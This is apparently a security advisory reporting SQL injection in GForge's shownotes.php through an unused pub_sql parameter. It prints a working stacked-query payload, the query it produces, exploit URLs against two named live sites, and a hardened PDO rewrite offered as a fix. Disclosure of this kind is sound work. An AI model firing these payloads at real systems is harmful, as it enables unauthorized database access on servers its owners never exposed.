Details
It seems that $pub_sql is not actually used anywhere here, yet it is interpolated straight into the query string. File shownotes.php, line 31:
$result=db_query("SELECT frs_release.notes,frs_release.changes,
frs_release.preformatted,frs_release.name,frs_package.group_id,frs_package.is_public
FROM frs_release,frs_package
WHERE frs_release.package_id=frs_package.package_id
$pub_sql
AND frs_release.release_id='$release_id'");
With a specially crafted pub_sql value an attacker can run arbitrary SQL queries:
pub_sql=;select 1 as is_public, X as group_id, current_user as name, 4 as
notes, version() as changes, 6;/*
release_id=*/ -- b
With X being a valid group_id on the installation, the resulting query is:
SELECT frs_release.notes,frs_release.changes,
frs_release.preformatted,frs_release.name,frs_package.group_id,frs_package.is_public
FROM frs_release,frs_package
WHERE frs_release.package_id=frs_package.package_id
;select 1 as is_public, X as group_id, current_user as name, 4 as notes,
version() as changes, 6;/*
AND frs_release.release_id='*/ -- b'
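A hardened form of the query above, added here as an example and not GForge's own fix: the unused $pub_sql fragment is dropped entirely and release_id is validated and bound as a parameter, so a value such as `*/ -- b` can no longer change the statement's structure. It assumes a PDO connection ($db) instead of GForge's db_query() wrapper and that release_id is an integer column; both are assumptions.

```php
<?php
// Added example, not GForge code: fetch release notes without building SQL from request input.
// Assumes a PDO connection $db (PostgreSQL in GForge's case) and an integer release_id column.

function fetch_release_notes(PDO $db, $release_id)
{
    // Reject anything that is not a plain positive integer before it reaches the database.
    if (!preg_match('/^[0-9]+$/', (string) $release_id)) {
        return null;
    }

    // The original query interpolated $pub_sql and $release_id into the SQL text.
    // Here the statement text is fixed; only the value is bound. Any visibility
    // restriction (e.g. on frs_package.is_public) belongs in this fixed text or in
    // another bound parameter, never in a fragment taken from the request.
    $sql = 'SELECT frs_release.notes, frs_release.changes,
                   frs_release.preformatted, frs_release.name,
                   frs_package.group_id, frs_package.is_public
            FROM frs_release, frs_package
            WHERE frs_release.package_id = frs_package.package_id
              AND frs_release.release_id = :release_id';

    $stmt = $db->prepare($sql);
    $stmt->bindValue(':release_id', (int) $release_id, PDO::PARAM_INT);
    $stmt->execute();

    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Usage (hypothetical): $row = fetch_release_notes($db, isset($_GET['release_id']) ? $_GET['release_id'] : '');
```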
Example sites
http://gforge.lug.fi.uba.ar/frs/shownotes.php?release_id=*/%20--%20454&pub_sql=;select%201%20as%20is_public,11%20as%20group_id,current_user%20as%20name,4%20as%20notes,version()%20as%20changes,6;/*
http://alioth.debian.org/frs/shownotes.php?release_id=*/%20--%20454&pub_sql=;select%201%20as%20is_public,30865%20as%20group_id,current_user%20as%20name,4%20as%20notes,version()%20as%20changes,6;/*
The Debian site will probably be fixed soon; I'm reporting this to them too.